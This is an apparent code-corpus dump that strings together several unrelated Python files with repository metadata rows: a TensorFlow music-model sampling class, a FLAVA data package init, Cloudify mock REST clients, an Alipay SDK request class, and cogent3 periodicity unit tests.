          'A length must be specified when the end token is not used.')
    batch_size = self._config.hparams.batch_size
    n = len(z)
    length = length or tf.int32.max

    # Zero-pad z so the count is a multiple of batch_size; stripped at return.
    batch_pad_amt = -n % batch_size
    z = np.pad(z, [(0, batch_pad_amt), (0, 0)], mode='constant')

    outputs = []
    for i in range(len(z) // batch_size):
      feed_dict = {
          self._temperature: temperature,
          self._z_input: z[i*batch_size:(i+1)*batch_size],
          self._max_length: length,
      }
      if self._c_input is not None:
        feed_dict[self._c_input] = c_input
      if return_full_results:
        outputs.extend(self._sess.run(self._decoder_results, feed_dict))
      else:
        outputs.extend(self._sess.run(self._outputs, feed_dict))
    return outputs[:n]
| 39.964392 | 80 | 0.676938 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import re
import numpy as np
import tensorflow as tf
class NoExtractedExamplesException(Exception):
pass
class MultipleExtractedExamplesException(Exception):
pass
class TrainedModel(object):
def __init__(self, config, batch_size, checkpoint_dir_or_path=None,
var_name_substitutions=None, session_target='', **sample_kwargs):
checkpoint_path = (tf.train.latest_checkpoint(checkpoint_dir_or_path)
if tf.gfile.IsDirectory(checkpoint_dir_or_path) else
checkpoint_dir_or_path)
self._config = copy.deepcopy(config)
self._config.hparams.batch_size = batch_size
with tf.Graph().as_default():
model = self._config.model
model.build(
self._config.hparams,
self._config.data_converter.output_depth,
is_training=False)
self._temperature = tf.placeholder(tf.float32, shape=())
self._z_input = (
tf.placeholder(tf.float32,
shape=[batch_size, self._config.hparams.z_size])
if self._config.hparams.z_size else None)
self._c_input = (
tf.placeholder(
tf.float32,
shape=[None, self._config.data_converter.control_depth])
if self._config.data_converter.control_depth > 0 else None)
self._inputs = tf.placeholder(
tf.float32,
shape=[batch_size, None, self._config.data_converter.input_depth])
self._controls = tf.placeholder(
tf.float32,
shape=[batch_size, None, self._config.data_converter.control_depth])
self._inputs_length = tf.placeholder(
tf.int32,
shape=[batch_size] + list(self._config.data_converter.length_shape))
self._max_length = tf.placeholder(tf.int32, shape=())
self._outputs, self._decoder_results = model.sample(
batch_size,
max_length=self._max_length,
z=self._z_input,
c_input=self._c_input,
temperature=self._temperature,
**sample_kwargs)
if self._config.hparams.z_size:
q_z = model.encode(self._inputs, self._inputs_length, self._controls)
self._mu = q_z.loc
self._sigma = q_z.scale.diag
self._z = q_z.sample()
var_map = None
if var_name_substitutions is not None:
var_map = {}
for v in tf.global_variables():
var_name = v.name[:-2]
for pattern, substitution in var_name_substitutions:
var_name = re.sub(pattern, substitution, var_name)
if var_name != v.name[:-2]:
tf.logging.info('Renaming `%s` to `%s`.', v.name[:-2], var_name)
var_map[var_name] = v
self._sess = tf.Session(target=session_target)
saver = tf.train.Saver(var_map)
saver.restore(self._sess, checkpoint_path)
def sample(self, n=None, length=None, temperature=1.0, same_z=False,
c_input=None):
batch_size = self._config.hparams.batch_size
n = n or batch_size
z_size = self._config.hparams.z_size
if not length and self._config.data_converter.end_token is None:
raise ValueError(
'A length must be specified when the end token is not used.')
length = length or tf.int32.max
feed_dict = {
self._temperature: temperature,
self._max_length: length
}
if self._z_input is not None and same_z:
z = np.random.randn(z_size).astype(np.float32)
z = np.tile(z, (batch_size, 1))
feed_dict[self._z_input] = z
if self._c_input is not None:
feed_dict[self._c_input] = c_input
outputs = []
for _ in range(int(np.ceil(n / batch_size))):
if self._z_input is not None and not same_z:
feed_dict[self._z_input] = (
np.random.randn(batch_size, z_size).astype(np.float32))
outputs.append(self._sess.run(self._outputs, feed_dict))
samples = np.vstack(outputs)[:n]
if self._c_input is not None:
return self._config.data_converter.to_items(
samples, np.tile(np.expand_dims(c_input, 0), [batch_size, 1, 1]))
else:
return self._config.data_converter.to_items(samples)
def encode(self, note_sequences, assert_same_length=False):
if not self._config.hparams.z_size:
raise RuntimeError('Cannot encode with a non-conditional model.')
inputs = []
controls = []
lengths = []
for note_sequence in note_sequences:
extracted_tensors = self._config.data_converter.to_tensors(note_sequence)
if not extracted_tensors.inputs:
raise NoExtractedExamplesException(
'No examples extracted from NoteSequence: %s' % note_sequence)
if len(extracted_tensors.inputs) > 1:
raise MultipleExtractedExamplesException(
'Multiple (%d) examples extracted from NoteSequence: %s' %
(len(extracted_tensors.inputs), note_sequence))
inputs.append(extracted_tensors.inputs[0])
controls.append(extracted_tensors.controls[0])
lengths.append(extracted_tensors.lengths[0])
if assert_same_length and len(inputs[0]) != len(inputs[-1]):
raise AssertionError(
'Sequences 0 and %d have different lengths: %d vs %d' %
(len(inputs) - 1, len(inputs[0]), len(inputs[-1])))
return self.encode_tensors(inputs, lengths, controls)
def encode_tensors(self, input_tensors, lengths, control_tensors=None):
if not self._config.hparams.z_size:
raise RuntimeError('Cannot encode with a non-conditional model.')
n = len(input_tensors)
input_depth = self._config.data_converter.input_depth
batch_size = self._config.hparams.batch_size
batch_pad_amt = -n % batch_size
if batch_pad_amt > 0:
input_tensors += [np.zeros([0, input_depth])] * batch_pad_amt
length_array = np.array(lengths, np.int32)
length_array = np.pad(
length_array,
[(0, batch_pad_amt)] + [(0, 0)] * (length_array.ndim - 1),
'constant')
max_length = max([len(t) for t in input_tensors])
inputs_array = np.zeros(
[len(input_tensors), max_length, input_depth])
for i, t in enumerate(input_tensors):
inputs_array[i, :len(t)] = t
control_depth = self._config.data_converter.control_depth
controls_array = np.zeros(
[len(input_tensors), max_length, control_depth])
if control_tensors is not None:
control_tensors += [np.zeros([0, control_depth])] * batch_pad_amt
for i, t in enumerate(control_tensors):
controls_array[i, :len(t)] = t
outputs = []
for i in range(len(inputs_array) // batch_size):
batch_begin = i * batch_size
batch_end = (i+1) * batch_size
feed_dict = {self._inputs: inputs_array[batch_begin:batch_end],
self._controls: controls_array[batch_begin:batch_end],
self._inputs_length: length_array[batch_begin:batch_end]}
outputs.append(
self._sess.run([self._z, self._mu, self._sigma], feed_dict))
assert outputs
return tuple(np.vstack(v)[:n] for v in zip(*outputs))
def decode(self, z, length=None, temperature=1.0, c_input=None):
tensors = self.decode_to_tensors(z, length, temperature, c_input)
if self._c_input is not None:
return self._config.data_converter.to_items(
tensors, np.tile(np.expand_dims(c_input, 0),
[self._config.hparams.batch_size, 1, 1]))
else:
return self._config.data_converter.to_items(tensors)
  def decode_to_tensors(self, z, length=None, temperature=1.0, c_input=None,
                        return_full_results=False):
    """Decodes latent vectors into raw output tensors, batch by batch.

    Args:
      z: Collection of latent vectors, one per sample to decode.
      length: Maximum decode length in steps. Required when the data
        converter has no end token; otherwise defaults to `tf.int32.max`.
      temperature: Softmax sampling temperature for the decoder.
      c_input: Control sequence to condition on, when the model uses one.
      return_full_results: If True, return the full decoder results instead
        of only the sampled outputs.

    Returns:
      The first len(z) decoded outputs (or full decoder results).

    Raises:
      RuntimeError: If the model has no latent space (z_size == 0).
      ValueError: If `length` is not given and the converter has no end token.
    """
    if not self._config.hparams.z_size:
      raise RuntimeError('Cannot decode with a non-conditional model.')
    if not length and self._config.data_converter.end_token is None:
      raise ValueError(
          'A length must be specified when the end token is not used.')
    batch_size = self._config.hparams.batch_size
    n = len(z)
    length = length or tf.int32.max
    # Zero-pad z so it divides evenly into full batches.
    batch_pad_amt = -n % batch_size
    z = np.pad(z, [(0, batch_pad_amt), (0, 0)], mode='constant')
    outputs = []
    for i in range(len(z) // batch_size):
      feed_dict = {
          self._temperature: temperature,
          self._z_input: z[i*batch_size:(i+1)*batch_size],
          self._max_length: length,
      }
      if self._c_input is not None:
        feed_dict[self._c_input] = c_input
      if return_full_results:
        outputs.extend(self._sess.run(self._decoder_results, feed_dict))
      else:
        outputs.extend(self._sess.run(self._outputs, feed_dict))
    # Drop the outputs produced for the padding vectors.
    return outputs[:n]
| true | true |
1c2ca31a29d1b7f2731163603636af4932896ea7 | 411 | py | Python | examples/flava/data/__init__.py | facebookresearch/multimodal | 13e60d9b4e421d1d5304e861cf4e54c3e376c7f1 | [
"BSD-3-Clause"
] | 128 | 2022-03-24T21:54:28.000Z | 2022-03-31T20:15:41.000Z | examples/flava/data/__init__.py | facebookresearch/multimodal | 13e60d9b4e421d1d5304e861cf4e54c3e376c7f1 | [
"BSD-3-Clause"
] | 2 | 2022-03-28T20:58:38.000Z | 2022-03-31T18:43:43.000Z | examples/flava/data/__init__.py | facebookresearch/multimodal | 13e60d9b4e421d1d5304e861cf4e54c3e376c7f1 | [
"BSD-3-Clause"
] | 3 | 2022-03-25T13:34:02.000Z | 2022-03-30T21:57:04.000Z | # Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from .transforms import * # noqa F401
from .utils import * # noqa F401
from .imagenet_zeroshot_data import * # noqa F401
from .multitask import * # noqa F401
from .datamodules import * # noqa F401
| 34.25 | 71 | 0.742092 |
from .transforms import *
from .utils import *
from .imagenet_zeroshot_data import *
from .multitask import *
from .datamodules import *
| true | true |
1c2ca48001838c748ecda70e87d40f377105808a | 3,231 | py | Python | cloudify/tests/mocks/mock_rest_client.py | isaac-s/cloudify-common | 9f512a7e0b96bfdf7c4448fc1bddacf2ae577ba8 | [
"Apache-2.0"
] | null | null | null | cloudify/tests/mocks/mock_rest_client.py | isaac-s/cloudify-common | 9f512a7e0b96bfdf7c4448fc1bddacf2ae577ba8 | [
"Apache-2.0"
] | null | null | null | cloudify/tests/mocks/mock_rest_client.py | isaac-s/cloudify-common | 9f512a7e0b96bfdf7c4448fc1bddacf2ae577ba8 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
############
from cloudify_rest_client.agents import Agent
from cloudify_rest_client import CloudifyClient
from cloudify_rest_client.executions import Execution
from cloudify_rest_client.node_instances import NodeInstance
node_instances = {}
def put_node_instance(node_instance_id,
                      state='started',
                      runtime_properties=None,
                      relationships=None):
    """Register a mock NodeInstance in the module-level store.

    Later lookups through MockNodeInstancesClient.get read from the same
    `node_instances` dict this writes to.
    """
    instance_data = {
        'id': node_instance_id,
        'state': state,
        'version': 0,
        'runtime_properties': runtime_properties,
        'relationships': relationships,
    }
    node_instances[node_instance_id] = NodeInstance(instance_data)
class MockRestclient(CloudifyClient):
    """In-memory stand-in for CloudifyClient.

    Every sub-client property returns a fresh mock instance, so code under
    test never performs real REST calls. Note each property access creates
    a new mock object.
    """

    def __init__(self):
        # Deliberately skip CloudifyClient.__init__: no host/credentials
        # are needed and no connection is established.
        pass

    @property
    def node_instances(self):
        return MockNodeInstancesClient()

    @property
    def nodes(self):
        return MockNodesClient()

    @property
    def executions(self):
        return MockExecutionsClient()

    @property
    def manager(self):
        return MockManagerClient()

    @property
    def agents(self):
        return MockAgentsClient()

    @property
    def operations(self):
        return MockOperationsClient()
class MockNodesClient(object):
    """Mock of the nodes client; deployments never have nodes here."""

    def list(self, deployment_id):
        """Return the (always empty) node list for *deployment_id*."""
        del deployment_id  # unused by the mock
        return []
class MockNodeInstancesClient(object):
    """Mock node-instances client backed by the module-level store."""

    def get(self, node_instance_id, evaluate_functions=False):
        """Look up a stored instance; raise if it was never registered."""
        try:
            return node_instances[node_instance_id]
        except KeyError:
            raise RuntimeError(
                'No info for node with id {0}'.format(node_instance_id))

    def list(self, deployment_id):
        """No instances are ever listed per deployment in this mock."""
        return []
class MockExecutionsClient(object):
    """Mock executions client; updates are no-ops."""

    def update(self, *args, **kwargs):
        """Accept and ignore any update request."""
        return None

    def get(self, id):
        """Return a canned execution that has already terminated."""
        execution_data = {
            'id': '111',
            'status': 'terminated',
        }
        return Execution(execution_data)
class MockManagerClient(object):
    """Mock manager client exposing an empty bootstrap context."""

    def get_context(self):
        """Return a context payload with no entries."""
        empty_context = {}
        return {'context': empty_context}
class MockAgentsClient(object):
    """Mock agents client returning canned Agent objects."""

    def update(self, name, state):
        """Echo back an agent carrying the requested state."""
        return Agent({'id': name, 'name': name, 'state': state})

    def get(self, name):
        """Every agent this mock knows about is already started."""
        return Agent({'id': name, 'name': name, 'state': 'started'})

    def create(self, name, node_instance_id, state, create_rabbitmq_user=True,
               **kwargs):
        """Build an agent record; extra keyword arguments are ignored."""
        agent_data = {
            'id': name,
            'name': name,
            'node_instance_id': node_instance_id,
            'state': state,
            'create_rabbitmq_user': create_rabbitmq_user,
        }
        return Agent(agent_data)
class MockOperationsClient(object):
    """Mock operations client; state updates are silently discarded."""

    def update(self, operation_id, state):
        """Ignore the requested state change."""
        return None
| 24.477273 | 78 | 0.629836 |
_client import CloudifyClient
from cloudify_rest_client.executions import Execution
from cloudify_rest_client.node_instances import NodeInstance
node_instances = {}
def put_node_instance(node_instance_id,
state='started',
runtime_properties=None,
relationships=None):
node_instances[node_instance_id] = NodeInstance({
'id': node_instance_id,
'state': state,
'version': 0,
'runtime_properties': runtime_properties,
'relationships': relationships
})
class MockRestclient(CloudifyClient):
def __init__(self):
pass
@property
def node_instances(self):
return MockNodeInstancesClient()
@property
def nodes(self):
return MockNodesClient()
@property
def executions(self):
return MockExecutionsClient()
@property
def manager(self):
return MockManagerClient()
@property
def agents(self):
return MockAgentsClient()
@property
def operations(self):
return MockOperationsClient()
class MockNodesClient(object):
def list(self, deployment_id):
return []
class MockNodeInstancesClient(object):
def get(self, node_instance_id, evaluate_functions=False):
if node_instance_id not in node_instances:
raise RuntimeError(
'No info for node with id {0}'.format(node_instance_id))
return node_instances[node_instance_id]
def list(self, deployment_id):
return []
class MockExecutionsClient(object):
def update(self, *args, **kwargs):
return None
def get(self, id):
return Execution({
'id': '111',
'status': 'terminated'
})
class MockManagerClient(object):
def get_context(self):
return {'context': {}}
class MockAgentsClient(object):
def update(self, name, state):
return Agent({
'id': name,
'name': name,
'state': state
})
def get(self, name):
return Agent({
'id': name,
'name': name,
'state': 'started'
})
def create(self, name, node_instance_id, state, create_rabbitmq_user=True,
**kwargs):
return Agent({
'id': name,
'name': name,
'node_instance_id': node_instance_id,
'state': state,
'create_rabbitmq_user': create_rabbitmq_user
})
class MockOperationsClient(object):
def update(self, operation_id, state):
pass
| true | true |
1c2ca5caff5ef0a6f27869b1cd2cf147940affc7 | 3,960 | py | Python | alipay/aop/api/request/AlipayCommerceYuntaskResumeRequest.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/request/AlipayCommerceYuntaskResumeRequest.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/request/AlipayCommerceYuntaskResumeRequest.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayCommerceYuntaskResumeModel import AlipayCommerceYuntaskResumeModel
class AlipayCommerceYuntaskResumeRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayCommerceYuntaskResumeModel):
self._biz_content = value
else:
self._biz_content = AlipayCommerceYuntaskResumeModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.commerce.yuntask.resume'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| 27.310345 | 148 | 0.643939 |
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayCommerceYuntaskResumeModel import AlipayCommerceYuntaskResumeModel
class AlipayCommerceYuntaskResumeRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayCommerceYuntaskResumeModel):
self._biz_content = value
else:
self._biz_content = AlipayCommerceYuntaskResumeModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.commerce.yuntask.resume'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| true | true |
1c2ca6bd4627da89353bbf6e0e73bd6a23178cc2 | 11,633 | py | Python | tests/test_maths/test_period.py | wjjmjh/Cogent3-GitHub-CI | c79c82c4b51f56be50f1079ddcdfcffaccaf80dd | [
"BSD-3-Clause"
] | null | null | null | tests/test_maths/test_period.py | wjjmjh/Cogent3-GitHub-CI | c79c82c4b51f56be50f1079ddcdfcffaccaf80dd | [
"BSD-3-Clause"
] | null | null | null | tests/test_maths/test_period.py | wjjmjh/Cogent3-GitHub-CI | c79c82c4b51f56be50f1079ddcdfcffaccaf80dd | [
"BSD-3-Clause"
] | null | null | null | from numpy import arange, array, convolve, exp, float64, pi, random, sin, zeros
from cogent3.maths.period import _autocorr_inner2 as py_autocorr_inner
from cogent3.maths.period import _goertzel_inner as py_goertzel_inner
from cogent3.maths.period import _ipdft_inner2 as py_ipdft_inner
from cogent3.maths.period import auto_corr, dft, goertzel, hybrid, ipdft
from cogent3.maths.period_numba import autocorr_inner as numba_autocorr_inner
from cogent3.maths.period_numba import goertzel_inner as numba_goertzel_inner
from cogent3.maths.period_numba import ipdft_inner as numba_ipdft_inner
from cogent3.util.unit_test import TestCase, main
__author__ = "Hua Ying, Julien Epps and Gavin Huttley"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["Julien Epps", "Hua Ying", "Gavin Huttley"]
__license__ = "BSD-3"
__version__ = "2020.2.7a"
__maintainer__ = "Gavin Huttley"
__email__ = "Gavin.Huttley@anu.edu.au"
__status__ = "Production"
class TestPeriod(TestCase):
    """Tests for cogent3 periodicity estimators (autocorr, dft, ipdft,
    goertzel, hybrid) and their numba-accelerated inner loops."""

    def setUp(self):
        # Build a noisy sinusoid: period 10 samples (frequency 1 over
        # t-step 0.1), plus exponentially smoothed gaussian noise.
        t = arange(0, 10, 0.1)
        n = random.randn(len(t))
        nse = convolve(n, exp(-t / 0.05)) * 0.1
        nse = nse[: len(t)]
        self.sig = sin(2 * pi * t) + nse
        self.p = 10

    def test_inner_funcs(self):
        """pure-python and numba implementations should be the same"""
        # Goertzel inner loop: fixed 100-sample signal, period 10.
        x = array(
            [
                0.04874203,
                0.56831373,
                0.94267804,
                0.95664485,
                0.60719478,
                -0.09037356,
                -0.69897319,
                -1.11239811,
                -0.84127485,
                -0.56281126,
                0.02301213,
                0.56250284,
                1.0258557,
                1.03906527,
                0.69885916,
                0.10103556,
                -0.43248024,
                -1.03160503,
                -0.84901545,
                -0.84934356,
                0.00323728,
                0.44344594,
                0.97736748,
                1.01635433,
                0.38538423,
                0.09869918,
                -0.60441861,
                -0.90175391,
                -1.00166887,
                -0.66303249,
                -0.02070569,
                0.76520328,
                0.93462426,
                0.97011673,
                0.63199999,
                0.0764678,
                -0.55680168,
                -0.92028808,
                -0.98481451,
                -0.57600588,
                0.0482667,
                0.57572519,
                1.02077883,
                0.93271663,
                0.41581696,
                -0.07639671,
                -0.71426286,
                -0.97730119,
                -1.0370596,
                -0.67919572,
                0.03779302,
                0.60408759,
                0.87826068,
                0.79126442,
                0.69769622,
                0.01419442,
                -0.42917556,
                -1.00100485,
                -0.83945546,
                -0.55746313,
                0.12730859,
                0.60057659,
                0.98059721,
                0.83275501,
                0.69031804,
                0.02277554,
                -0.63982729,
                -1.23680355,
                -0.79477887,
                -0.67773375,
                -0.05204714,
                0.51765381,
                0.77691955,
                0.8996709,
                0.5153137,
                0.01840839,
                -0.65124866,
                -1.13269058,
                -0.92342177,
                -0.45673709,
                0.11212881,
                0.50153941,
                1.09329507,
                0.96457193,
                0.80271578,
                -0.0041043,
                -0.81750772,
                -0.99259986,
                -0.92343788,
                -0.57694955,
                0.13982059,
                0.56653375,
                0.82217563,
                0.85162513,
                0.3984116,
                -0.18937514,
                -0.65304629,
                -1.0067146,
                -1.0037422,
                -0.68011283,
            ]
        )
        N = 100
        period = 10
        self.assertFloatEqual(
            py_goertzel_inner(x, N, period), numba_goertzel_inner(x, N, period)
        )
        # IPDFT inner loop: 8-sample square-ish wave, precomputed twiddle
        # factors W; compare magnitudes of complex outputs.
        ulim = 8
        N = 8
        x = array([0.0, 1.0, 0.0, -1.0, 0.0, 1.0, 0.0, -1.0])
        X = zeros(8, dtype="complex128")
        W = array(
            [
                1.00000000e00 + 2.44929360e-16j,
                -1.00000000e00 - 1.22464680e-16j,
                -5.00000000e-01 - 8.66025404e-01j,
                6.12323400e-17 - 1.00000000e00j,
                3.09016994e-01 - 9.51056516e-01j,
                5.00000000e-01 - 8.66025404e-01j,
                6.23489802e-01 - 7.81831482e-01j,
                7.07106781e-01 - 7.07106781e-01j,
            ]
        )
        py_result = py_ipdft_inner(x, X, W, ulim, N)
        numba_result = numba_ipdft_inner(x, X, W, ulim, N)
        for i, j in zip(py_result, numba_result):
            self.assertFloatEqual(abs(i), abs(j))
        # Autocorrelation inner loop: both implementations fill an output
        # buffer of length 2N-1 in place; compare element-wise.
        x = array(
            [
                -0.07827614,
                0.56637551,
                1.01320526,
                1.01536245,
                0.63548361,
                0.08560101,
                -0.46094955,
                -0.78065656,
                -0.8893556,
                -0.56514145,
                0.02325272,
                0.63660719,
                0.86291302,
                0.82953598,
                0.5706848,
                0.11655242,
                -0.6472655,
                -0.86178218,
                -0.96495057,
                -0.76098445,
                -0.18911517,
                0.59280646,
                1.00248693,
                0.89241423,
                0.52475111,
                -0.01620599,
                -0.60199278,
                -0.98279829,
                -1.12469771,
                -0.61355799,
                0.04321191,
                0.52784788,
                0.68508784,
                0.86015123,
                0.66825756,
                -0.0802846,
                -0.63626753,
                -0.93023345,
                -0.99129547,
                -0.46891033,
                0.04145813,
                0.71226518,
                1.01499246,
                0.94726778,
                0.63598143,
                -0.21920589,
                -0.48071702,
                -0.86041579,
                -0.9046141,
                -0.55714746,
                -0.10052384,
                0.69708969,
                1.02575789,
                1.16524031,
                0.49895282,
                -0.13068573,
                -0.45770419,
                -0.86155787,
                -0.9230734,
                -0.6590525,
                -0.05072955,
                0.52380317,
                1.02674335,
                0.87778499,
                0.4303284,
                -0.01855665,
                -0.62858193,
                -0.93954774,
                -0.94257301,
                -0.49692951,
                0.00699347,
                0.69049074,
                0.93906549,
                1.06339809,
                0.69337543,
                0.00252569,
                -0.57825881,
                -0.88460603,
                -0.99259672,
                -0.73535697,
                0.12064751,
                0.91159174,
                0.88966993,
                1.02159917,
                0.43479926,
                -0.06159005,
                -0.61782651,
                -0.95284676,
                -0.8218889,
                -0.52166419,
                0.021961,
                0.52268762,
                0.79428288,
                1.01642697,
                0.49060377,
                -0.02183994,
                -0.52743836,
                -0.99363909,
                -1.02963821,
                -0.64249996,
            ]
        )
        py_xc = zeros(2 * len(x) - 1, dtype=float64)
        numba_xc = py_xc.copy()
        N = 100
        py_autocorr_inner(x, py_xc, N)
        numba_autocorr_inner(x, numba_xc, N)
        for i, j in zip(py_xc, numba_xc):
            self.assertFloatEqual(i, j)

    def test_autocorr(self):
        """correctly compute autocorrelation"""
        # Constant signal: autocorrelation is the triangle 1,2,3,4,3,2,1.
        s = [1, 1, 1, 1]
        X, periods = auto_corr(s, llim=-3, ulim=None)
        exp_X = array([1, 2, 3, 4, 3, 2, 1], dtype=float)
        self.assertEqual(X, exp_X)
        # Peak of the autocorrelation should recover the known period.
        auto_x, auto_periods = auto_corr(self.sig, llim=2, ulim=50)
        max_idx = list(auto_x).index(max(auto_x))
        auto_p = auto_periods[max_idx]
        self.assertEqual(auto_p, self.p)

    def test_dft(self):
        """correctly compute discrete fourier transform"""
        # Dominant spectral peak should correspond to the known period.
        dft_x, dft_periods = dft(self.sig)
        dft_x = abs(dft_x)
        max_idx = list(dft_x).index(max(dft_x))
        dft_p = dft_periods[max_idx]
        self.assertEqual(int(dft_p), self.p)

    def test_ipdft(self):
        """correctly compute integer discrete fourier transform"""
        # Known IPDFT magnitudes for a short alternating signal.
        s = [0, 1, 0, -1, 0, 1, 0, -1]
        X, periods = ipdft(s, llim=1, ulim=len(s))
        exp_X = abs(
            array(
                [
                    0,
                    0,
                    -1.5 + 0.866j,
                    -4j,
                    2.927 - 0.951j,
                    1.5 + 0.866j,
                    0.302 + 0.627j,
                    0,
                ]
            )
        )
        X = abs(X)
        self.assertFloatEqual(X, exp_X, eps=1e-3)
        # Peak of the IPDFT should recover the known period of the fixture.
        ipdft_x, ipdft_periods = ipdft(self.sig, llim=2, ulim=50)
        ipdft_x = abs(ipdft_x)
        max_idx = list(ipdft_x).index(max(ipdft_x))
        ipdft_p = ipdft_periods[max_idx]
        self.assertEqual(ipdft_p, self.p)

    def test_goertzel(self):
        """goertzel and ipdft should be the same"""
        # Goertzel at a single period equals the IPDFT restricted to it.
        ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=10, ulim=10)
        self.assertFloatEqual(goertzel(self.sig, 10), ipdft_pwr)

    def test_hybrid(self):
        """correctly compute hybrid statistic"""
        # Peak of the hybrid statistic should recover the known period.
        hybrid_x, hybrid_periods = hybrid(self.sig, llim=None, ulim=50)
        hybrid_x = abs(hybrid_x)
        max_idx = list(hybrid_x).index(max(hybrid_x))
        hybrid_p = hybrid_periods[max_idx]
        self.assertEqual(hybrid_p, self.p)

    def test_hybrid_returns_all(self):
        """correctly returns hybrid, ipdft and autocorr statistics"""
        # With return_all=True, hybrid returns (hybrid, ipdft, autocorr)
        # statistics that match the standalone estimators.
        ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=2, ulim=50)
        auto_x, auto_periods = auto_corr(self.sig, llim=2, ulim=50)
        hybrid_x, hybrid_periods = hybrid(self.sig, llim=None, ulim=50)
